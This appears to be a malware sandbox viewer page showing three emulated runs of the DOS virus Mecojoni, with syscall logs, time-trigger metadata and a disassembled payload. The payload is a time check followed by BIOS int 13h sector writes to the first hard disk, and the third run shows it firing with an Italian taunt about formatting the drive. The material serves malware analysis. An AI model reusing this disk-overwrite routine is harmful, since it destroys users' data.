Sample viewer

vx.netlux.org/Virus.DOS.FaxFree.Mecojoni.h

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:09:27.986904531Z 74 PC: 12d1b | Reallocate memory
2018-12-17T23:09:27.989806324Z 72 PC: 12d22 | Allocate memory
2018-12-17T23:09:27.991668544Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-17T23:09:27.993902824Z 72 PC: 13262 | Allocate memory
2018-12-17T23:09:27.995552825Z 75 PC: 1329d | Execute program
2018-12-17T23:09:28.011736631Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-17T23:09:28.014996628Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:09:28.01648251Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:09:28.018450639Z 77 PC: 132cc | Get program return code
2018-12-17T23:09:28.01977056Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:11.737506932Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:53:11.739147754Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:53:11.740592499Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:53:11.742593009Z 72 PC: 13262 | Allocate memory
2018-12-25T12:53:11.744415377Z 75 PC: 1329d | Execute program
2018-12-25T12:53:11.758922454Z 76 PC: 13934 | Terminate with return code (Return code = '0')
2018-12-25T12:53:11.761591286Z 53 PC: 132b1 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:53:11.780452467Z 37 PC: 132c8 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:53:11.781449382Z 77 PC: 132cc | Get program return code
2018-12-25T12:53:11.782439649Z 49 PC: 132d3 | Terminate and stay resident (Return code = '0' | Memory size = '96')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":57,"Second":0,"TimeBased":true,"OriginalID":16535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:12.778766809Z 74 PC: 12d1b | Reallocate memory
2018-12-25T12:53:12.780540883Z 72 PC: 12d22 | Allocate memory
2018-12-25T12:53:12.782059657Z 44 PC: 13461 | Get time 0x13461: cmp cl, 0x39
0x13464: jne 0x13499
0x13466: mov dl, 0x80
0x13468: mov dh, 0
0x1346a: mov ch, 0
0x1346c: mov cl, 1
0x1346e: mov al, 9
0x13470: mov ah, 3
0x13472: int 0x13
0x13474: mov dl, 0x80
0x13476: mov dh, 1
0x13478: mov ch, 0
0x1347a: mov cl, 1
0x1347c: mov al, 9
0x1347e: mov ah, 3
0x13480: int 0x13
0x13482: mov dx, 0x34a
0x13485: mov ah, 9
0x13487: int 0x21
0x13489: mov dx, 0x39b
2018-12-25T12:53:13.115370031Z 9 PC: 13489 | Display string (String= 'Ti sentivi sicuro. Avevi lo SCAN !!! Invece lo hai preso nel culo. Infatti il')
2018-12-25T12:53:13.123807489Z 9 PC: 13490 | Display string (String= 'virus MECOJONI ti ha formattato l Hard disk. MECOJONI � un virus self-modifying!')
2018-12-25T12:53:13.129118356Z 9 PC: 13497 | Display string (String= 'Sono state messe in circolazione 3000 varianti differenti di questo virus !!!!!')